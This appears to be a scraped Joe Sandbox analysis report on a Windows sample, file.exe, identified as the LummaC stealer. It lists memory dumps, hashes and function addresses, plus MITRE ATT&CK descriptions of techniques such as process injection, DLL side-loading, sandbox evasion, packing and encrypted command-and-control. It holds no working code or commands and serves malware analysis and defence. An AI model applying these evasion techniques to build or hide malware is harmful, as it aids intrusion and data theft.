Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
Instruction ID: 6506d07c58c905065930edc77b6421f51c28c54387ea28b09faa2761b04cb969
Opcode Fuzzy Hash: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
Instruction Fuzzy Hash: 1E0162B3A199610B8348CE3DDC1156BBAD15BD5770F19872DBEF5CB3E0D230C8118695

Function 00DBC5F0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
Instruction ID: afd6f86e1ed7dc578beff9a6215ab27dc393fb41cabbec3b70aacfa27007612f
Opcode Fuzzy Hash: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
Instruction Fuzzy Hash: EB014B72A196204B8308CE3C9C1112ABEE19B86330F158B2EBCFAD73E0D664CD548696

Function 00DBB410 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
Instruction ID: 81290ea3e672e9e53fe8037274998ed90bb6afa6e560afe1875162f38b52a44b
Opcode Fuzzy Hash: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
Instruction Fuzzy Hash: 48F0A7B16045149BDB228A589C80FB7BB9CDB8A368F190427E84657103D2A19845C3F5

Function 00DD8220 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a7abf481d9affc5693268ef78e82d8632f1cb4facb2eeed48ca5abd5141848
Instruction ID: d6e696368431bcdc50d160b566682a6037da6dc38a1705f2519367c42d2e4057
Opcode Fuzzy Hash: 02a7abf481d9affc5693268ef78e82d8632f1cb4facb2eeed48ca5abd5141848
Instruction Fuzzy Hash: 5101E4B04107409FC360EF29C445747BBE8EB08714F504A1DE8AECB780D770A5448B92

Function 00DE1440 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 5cc2bc0b68117641c4a7529aa6baa8133a582bfd26fecc21302447c41587ced3
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 4BD0A735708361469F749E1AA40097BF7F0EAC7B11F8D955EF586E3288D230DC41C2B9

Function 00DB1ACD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7df1dc4ceb8ce76c1e45d6b5fd1bd8cd0981548ed10cd1f7d0093468c80782
Instruction ID: 4a97e299afe2bfa823089d4de935efb177a73244c206c0fa2566484ea5b58186
Opcode Fuzzy Hash: dd7df1dc4ceb8ce76c1e45d6b5fd1bd8cd0981548ed10cd1f7d0093468c80782
Instruction Fuzzy Hash: 8DC08C38A19344CBC204EF04FCE5832B3B8A307308740B03ADA03FB3A1CA60D402C929

Function 00DE6094 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659855f4d5c18d9146fe80a33affcb182aa88cbee4ca9f30cb819399dd8ca806
Instruction ID: b0b0f3d819b4fcfda58404e1e9282d32e7dc6c49807e7aa9c326466a7fa6522c
Opcode Fuzzy Hash: 659855f4d5c18d9146fe80a33affcb182aa88cbee4ca9f30cb819399dd8ca806
Instruction Fuzzy Hash: AAC09B3465C140C7910CCF05E961575F3769FD7758725F01EC84663359C134D612D53C

Function 00DB1A3C Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4f6887addbd68870e264d338587f3727ceff354b6ea3572c512dded2632bb9
Instruction ID: 9271933b07a08227de16a06842288dcce3c274d223c029197399ddc891a71706
Opcode Fuzzy Hash: 2c4f6887addbd68870e264d338587f3727ceff354b6ea3572c512dded2632bb9
Instruction Fuzzy Hash: C2C09B34E59284CBC244DF85E8F1471A3FD5307208750703A9743FF3A1C560D4058519

Function 00DE5FD6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92f8befb22bcc991e18456e4c991c8d270f09122d3353016e9f6a58c4b9cd97
Instruction ID: 7775f1e61373851bdb74882ba460e4fb1ba6f02dabb33bae24232dc54d550ce1
Opcode Fuzzy Hash: d92f8befb22bcc991e18456e4c991c8d270f09122d3353016e9f6a58c4b9cd97
Instruction Fuzzy Hash: C3C09224B682008BA24CCF18DD61935F2BA9B8BA18B15F02EC806E335AD134D612C62C

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
file.exe

Function 00DE50FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
libraryCOMMON

Function 00DAFCA0 Relevance: 5.4, Strings: 4, Instructions: 373
COMMON

Function 00DAD110 Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Function 00DE5700 Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Function 00DE5BB0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00DE695B Relevance: 1.4, Strings: 1, Instructions: 100
COMMON

Function 00DB049B Relevance: .3, Instructions: 264
COMMON

Function 00DE3220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Function 00DE3202 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON